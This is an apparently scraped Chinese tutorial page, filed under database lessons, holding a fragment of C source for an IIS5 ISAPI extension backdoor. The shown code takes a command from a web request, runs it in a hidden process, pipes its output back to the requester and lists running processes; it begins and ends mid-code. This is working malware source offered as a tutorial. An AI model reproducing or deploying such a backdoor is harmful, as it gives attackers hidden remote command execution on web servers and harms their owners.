Mssql教程《IIS5 ISAPI Extension Back Door》

您现在的位置： e股脑 >> 数据库 >> Mssql教程 >> IIS5 ISAPI Extension Back Door >> 教程正文

教程搜索

图文教程

赞助商

IIS5 ISAPI Extension Back Door

来源：e股脑
点击次数：
更新时间：2007-8-9

tePipe2);

TerminateProcess( procInfo.hProcess , 0 );

return;

}

//运行一个程序

void ExecProgram( LPVOID arg )

{

WORKARG *workArg = (WORKARG *)arg;

SECURITY_ATTRIBUTES sa;

HANDLE hReadPipe1 = NULL;

HANDLE hWritePipe1 = NULL;

STARTUPINFO si;

PROCESS_INFORMATION procInfo;

char cmdLine[ARGSIZE] = { 0 };

char buff[BUFFSIZE] = { 0 };

int ret = 0;

unsigned long dwBytes = 0;

EXTENSION_CONTROL_BLOCK *pECB = workArg->pECB;

strcpy( cmdLine , workArg->arg );

if( cmdLine[0] == '' )

{

#ifdef DEBUG

LogStrToFile( "执行程序时，没有要输入要运行的程序\n" );

#endif

SendToClient( pECB , "No program to run...\n" );

SendToClient( pECB , FLAG );

return;

}

#ifdef DEBUG

LogStrToFile( "要运行的程序: " );

LogStrToFile( workArg->arg );

LogStrToFile( "\n" );

#endif

//安全选项

sa.nLength = sizeof( sa );

sa.lpSecurityDescriptor = 0;

sa.bInheritHandle = TRUE;

//初始化管道

if( !CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0) )

{

#ifdef DEBUG

LogStrToFile( "建立管道失败: " );

LogIntToFile( GetLastError() );

LogStrToFile( "\n" );

#endif

SendToClient( pECB , "Create pipi error...\n" );

SendToClient( pECB , FLAG );

return;

}

ZeroMemory( &si , sizeof(STARTUPINFO) );

GetStartupInfo( &si );

si.cb = sizeof( si );

si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

si.wShowWindow = SW_HIDE;

si.hStdOutput = si.hStdError = hWritePipe1;

ZeroMemory( &procInfo , sizeof(PROCESS_INFORMATION) );

ret = CreateProcess( NULL , cmdLine , NULL , NULL , 1 , 0 , NULL , NULL , &si , &procInfo );

if( !ret )

{

#ifdef DEBUG

LogStrToFile( "建立进程失败...\n" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "Create process error...\n" );

SendToClient( pECB , FLAG );

return;

}

memset( buff , 0 , BUFFSIZE );

//读取程序输出

while( dwBytes == 0 )

{

Sleep(200);

ret = PeekNamedPipe(hReadPipe1,buff,BUFFSIZE,&dwBytes,NULL,NULL);

}

ret = ReadFile( hReadPipe1,buff,dwBytes,&dwBytes,0 );

if( !ret )

{

#ifdef DEBUG

LogStrToFile( "读取输出失败: " );

LogIntToFile( GetLastError() );

LogStrToFile( "\n" );

#endif

}

#ifdef DEBUG

LogStrToFile( buff );

#endif

ret = SendToClient( pECB , buff );

if( ret<=0 )

{

#ifdef DEBUG

LogStrToFile( "发送输出失败:" );

LogIntToFile( GetLastError() );

LogStrToFile( "\n" );

#endif

}

CloseHandle(hReadPipe1);

CloseHandle(hWritePipe1);

TerminateProcess( procInfo.hProcess , 0 );

return;

}

void PsList( EXTENSION_CONTROL_BLOCK *pECB )

{

HANDLE hProcessSnap = NULL;

HANDLE hProcess = NULL;

PROCESSENTRY32 pe32;

char psBuff[BUFFSIZE] = { 0 };

SendToClient( pECB , "Process Information List 0.1\n\n" );

SendToClient( pECB , "Code by 云舒(wustyunshu@hotmail.com)\n" );

SendToClient( pECB , "www.ph4nt0m.org www.icylife.net\n" );

hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

if( hProcessSnap == INVALID_HANDLE_VALUE )

{

#ifdef DEBUG

LogStrToFile( "Call CreateToolhelp32Snapshot error" );

LogIntToFile( GetLastError() );

#endif

SendToClient( pECB , "List process information error...\n" );

return;

}

pe32.dwSize = sizeof( PROCESSENTRY32 );

if( !Process32First( hProcessSnap, &pe32 ) )

{

#ifdef DEBUG

LogStrToFile( "Call Process32First error" );

LogIntToFile( GetLastError() );

#endif

上一篇教程： char与varchar的区别

下一篇教程： mysql数据库连接过多的错误，可能的原因分析及解决办法